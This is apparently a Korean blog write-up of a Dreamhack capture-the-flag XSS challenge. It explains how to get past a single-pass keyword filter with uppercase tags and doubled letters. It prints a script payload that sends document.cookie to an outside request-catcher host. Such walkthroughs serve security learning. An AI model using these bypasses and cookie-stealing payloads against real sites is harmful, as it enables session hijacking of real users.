필터링 우회를 이용한 XSS 문제이다.
내가 제일 좋아하는 xss 필터링 우회 리스트를 모아둔 깃허브 주소이다.
https://gist.github.com/seo1-say/4c68e83069d7269e6e7e2c994e1fcf92
XSS Filter Bypass List
XSS Filter Bypass List. GitHub Gist: instantly share code, notes, and snippets.
gist.github.com
먼저 app.py 를 보면 다음과 같은 함수가 있다.
"script", "on", "javascript" 문자열이 있을 경우, 위 문자열을 없애는 필터링이 존재한다.
vuln 페이지에서 대문자 SCRIPT 문자열은 돌아간다는 것을 확인했다.
<SCRIPT>alert("XSS");</SCRIPT>
내가 사용할 코드는 다음과 같은데 문제는 location에 on도 필터링될 것이다.
<SCRIPT>location.href="/memo?memo="+document.cookie;</SCRIPT>
한 번 필터링하는 코드이기 때문에 해당 문자열을 두 번씩 주면 해결이 된다.
<SCRIPT>locatioonn.href="/memo?memo="+document.cookie;</SCRIPT>
서버를 이용한 코드는 아래와 같다.
<SCRIPT>locatioonn.href="https://gncplqf.request.dreamhack.games/?memo="+document.cookie;</SCRIPT>
728x90
'Security > Write Up' 카테고리의 다른 글
[Dreamhack] Mango (0) | 2023.06.11 |
---|---|
[Dreamhack] simple_sqli (0) | 2023.06.04 |
[Dreamhack] csrf-2 (0) | 2023.06.02 |
[Dreamhack] csrf-1 (0) | 2023.05.31 |
[Dreamhack] xss-2 (0) | 2023.05.30 |